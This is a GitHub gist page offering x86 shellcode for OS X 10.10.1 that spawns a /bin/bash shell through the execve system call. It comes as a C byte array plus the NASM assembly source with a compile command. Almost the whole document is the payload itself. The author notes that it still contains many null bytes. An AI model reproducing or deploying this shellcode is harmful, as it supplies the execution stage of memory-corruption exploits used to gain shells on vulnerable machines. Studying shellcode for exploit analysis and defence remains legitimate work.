Last active
August 29, 2015 14:16
-
-
Save jndok/f2050606e3fc19fa0b63 to your computer and use it in GitHub Desktop.
OS X 10.10.1 – shell spawn [x86]
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Yes, I am aware that this contains a shit ton of null bytes. | |
| I am still a total noob w/ x86, but I'll try to fix this ASAP. | |
| */ | |
| char shellcode[] = { | |
| '\xe9', '\x19', '\x00', '\x00', '\x00', | |
| '\x5e', | |
| '\xb8', '\x3b', '\x00', '\x00', '\x00', | |
| '\x68', '\x00', '\x00', '\x00', '\x00', | |
| '\x68', '\x00', '\x00', '\x00', '\x00', | |
| '\x56', | |
| '\x81', '\xec', '\x04', '\x00', '\x00', '\x00', | |
| '\xcd', '\x80', | |
| '\xe8', '\xe2', '\xff', '\xff', '\xff', | |
| '\x2f', | |
| '\x62', '\x69', '\x6e', | |
| '\x2f', | |
| '\x62', '\x61', '\x73', | |
| '\x68' | |
| }; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; compile with: `nasm -f macho spawn_shell.s && ld -o spawn_shell spawn_shell.o` | |
| global start | |
| section .text | |
| start: | |
| jmp store | |
| store: | |
| call spawn | |
| db "/bin/bash", 0x0 | |
| spawn: | |
| pop esi | |
| push 0x0 | |
| push 0x0 | |
| push esi | |
| mov eax, 0x3b | |
| sub esp, 0x4 | |
| int 0x80 | |
| add esp, 0x1C |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment